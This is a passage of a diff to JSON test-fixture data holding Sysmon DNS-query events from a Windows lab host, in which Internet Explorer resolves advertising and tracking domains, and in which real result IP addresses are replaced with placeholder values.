SystemTime='2019-07-18T03:34:09.067797800Z'/\u003e\u003cEventRecordID\u003e195\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.552\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003esync.jivox.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:54.243.145.203;::ffff:54.221.211.153;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;2001:502:1ca1::30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e" + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.067797800Z'/\u003e\u003cEventRecordID\u003e195\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.552\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003esync.jivox.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;2001:502:1ca1::30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e" } }, { @@ -7164,7 +7164,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.067819600Z'/\u003e\u003cEventRecordID\u003e196\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.594\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eb1sync.zemanta.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 b1-lsw-use1.zemanta.com;::ffff:207.244.121.25;::ffff:108.59.0.1;::ffff:162.210.196.115;::ffff:207.244.94.20;::ffff:108.59.0.12;::ffff:207.244.121.65;::ffff:162.210.199.69;::ffff:207.244.76.83;::ffff:162.210.197.137;::ffff:207.244.108.217;::ffff:207.244.121.137;::ffff:207.244.67.99;::ffff:198.7.56.229;::ffff:198.7.56.231;::ffff:108.59.4.172;::ffff:108.62.117.43;::ffff:108.59.4.171;::ffff:207.244.121.27;::ffff:207.244.71.67;::ffff:207.244.121.70;::ffff:199.58.84.25;::ffff:207.244.67.98;::ffff:162.210.196.116;::ffff:207.244.73.10;::ffff:207.244.110.3;::ffff:108.59.4.173;::ffff:108.59.0.8;::ffff:207.244.71.88;::ffff:207.244.121.73;::ffff:207.244.69.231;::ffff:108.59.0.2;::ffff:207.244.121.74;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;2001:502:1ca1::30;192.35.51.30;2001:503:d414::30;192.42.93.30;2001:503:eea3::30;192.54.112.30;2001:502:8cc::30;192.43.172.30;2001:503:39c1::30;192.48.79.30;2001:502:7094::30;192.5\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.067819600Z'/\u003e\u003cEventRecordID\u003e196\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.594\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eb1sync.zemanta.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 b1-lsw-use1.zemanta.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:198.7.56.229;::ffff:198.7.56.231;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;2001:502:1ca1::30;192.168.51.30;2001:503:d414::30;192.168.93.30;2001:503:eea3::30;192.168.112.30;2001:502:8cc::30;192.168.172.30;2001:503:39c1::30;192.168.79.30;2001:502:7094::30;192.5\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" @@ -7188,7 +7188,7 @@ "ProcessId": "2736", "QueryName": "b1sync.zemanta.com", "QueryStatus": "0", - "QueryResults": "type: 5 b1-lsw-use1.zemanta.com;::ffff:207.244.121.25;::ffff:108.59.0.1;::ffff:162.210.196.115;::ffff:207.244.94.20;::ffff:108.59.0.12;::ffff:207.244.121.65;::ffff:162.210.199.69;::ffff:207.244.76.83;::ffff:162.210.197.137;::ffff:207.244.108.217;::ffff:207.244.121.137;::ffff:207.244.67.99;::ffff:198.7.56.229;::ffff:198.7.56.231;::ffff:108.59.4.172;::ffff:108.62.117.43;::ffff:108.59.4.171;::ffff:207.244.121.27;::ffff:207.244.71.67;::ffff:207.244.121.70;::ffff:199.58.84.25;::ffff:207.244.67.98;::ffff:162.210.196.116;::ffff:207.244.73.10;::ffff:207.244.110.3;::ffff:108.59.4.173;::ffff:108.59.0.8;::ffff:207.244.71.88;::ffff:207.244.121.73;::ffff:207.244.69.231;::ffff:108.59.0.2;::ffff:207.244.121.74;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;2001:502:1ca1::30;192.35.51.30;2001:503:d414::30;192.42.93.30;2001:503:eea3::30;192.54.112.30;2001:502:8cc::30;192.43.172.30;2001:503:39c1::30;192.48.79.30;2001:502:7094::30;192.5", + "QueryResults": "type: 5 b1-lsw-use1.zemanta.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:198.7.56.229;::ffff:198.7.56.231;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;2001:502:1ca1::30;192.168.51.30;2001:503:d414::30;192.168.93.30;2001:503:eea3::30;192.168.112.30;2001:502:8cc::30;192.168.172.30;2001:503:39c1::30;192.168.79.30;2001:502:7094::30;192.5", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe" }, "process": { @@ -7219,7 +7219,7 @@ "event_data": { "QueryName": "tg.socdm.com", "QueryStatus": "0", - "QueryResults": "type: 5 tg3.dr.socdm.com;::ffff:124.146.215.43;::ffff:202.241.208.53;::ffff:124.146.215.46;::ffff:202.241.208.52;::ffff:124.146.215.48;::ffff:124.146.215.45;::ffff:202.241.208.54;::ffff:124.146.215.47;::ffff:124.146.215.42;::ffff:124.146.215.44;::ffff:202.241.208.55;::ffff:202.241.208.56;192.5.6.30;2001:503:a83e::2:30;", + "QueryResults": "type: 5 tg3.dr.socdm.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:08.619", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}", @@ -7236,7 +7236,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.067835500Z'/\u003e\u003cEventRecordID\u003e197\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.619\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003etg.socdm.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 tg3.dr.socdm.com;::ffff:124.146.215.43;::ffff:202.241.208.53;::ffff:124.146.215.46;::ffff:202.241.208.52;::ffff:124.146.215.48;::ffff:124.146.215.45;::ffff:202.241.208.54;::ffff:124.146.215.47;::ffff:124.146.215.42;::ffff:124.146.215.44;::ffff:202.241.208.55;::ffff:202.241.208.56;192.5.6.30;2001:503:a83e::2:30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.067835500Z'/\u003e\u003cEventRecordID\u003e197\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.619\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003etg.socdm.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 tg3.dr.socdm.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "code": "22", "kind": "event" @@ -7248,7 +7248,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.067845000Z'/\u003e\u003cEventRecordID\u003e198\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.620\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eprebid.adnxs.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 prebid.appnexusgslb.net;::ffff:68.67.153.75;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.067845000Z'/\u003e\u003cEventRecordID\u003e198\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.620\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eprebid.adnxs.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 prebid.appnexusgslb.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" @@ -7274,7 +7274,7 @@ "identifier": "S-1-5-18" }, "event_data": { - "QueryResults": "type: 5 prebid.appnexusgslb.net;::ffff:68.67.153.75;", + "QueryResults": "type: 5 prebid.appnexusgslb.net;::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:08.620", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}", @@ -7297,7 +7297,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.067883500Z'/\u003e\u003cEventRecordID\u003e199\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.811\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eul1.dvtps.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 tps.doubleverify.com;type: 5 tps-geo.dvgtm.akadns.net;type: 5 nycp-hlb.dvgtm.akadns.net;::ffff:204.154.111.122;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.067883500Z'/\u003e\u003cEventRecordID\u003e199\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:08.811\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eul1.dvtps.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 tps.doubleverify.com;type: 5 tps-geo.dvgtm.akadns.net;type: 5 nycp-hlb.dvgtm.akadns.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "kind": "event", "provider": "Microsoft-Windows-Sysmon", "code": "22" @@ -7319,7 +7319,7 @@ "event_data": { "QueryName": "ul1.dvtps.com", "QueryStatus": "0", - "QueryResults": "type: 5 tps.doubleverify.com;type: 5 tps-geo.dvgtm.akadns.net;type: 5 nycp-hlb.dvgtm.akadns.net;::ffff:204.154.111.122;", + "QueryResults": "type: 5 tps.doubleverify.com;type: 5 tps-geo.dvgtm.akadns.net;type: 5 nycp-hlb.dvgtm.akadns.net;::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:08.811", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}", @@ -7380,7 +7380,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.068003400Z'/\u003e\u003cEventRecordID\u003e201\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:09.016\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003etags.bluekai.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 tags.bluekai.com.edgekey.net;type: 5 e13541.x.akamaiedge.net;::ffff:23.3.125.199;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:09.068003400Z'/\u003e\u003cEventRecordID\u003e201\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:09.016\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003etags.bluekai.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 tags.bluekai.com.edgekey.net;type: 5 e13541.x.akamaiedge.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "kind": "event", "provider": "Microsoft-Windows-Sysmon", "code": "22" @@ -7397,7 +7397,7 @@ "ProcessId": "2736", "QueryName": "tags.bluekai.com", "QueryStatus": "0", - "QueryResults": "type: 5 tags.bluekai.com.edgekey.net;type: 5 e13541.x.akamaiedge.net;::ffff:23.3.125.199;", + "QueryResults": "type: 5 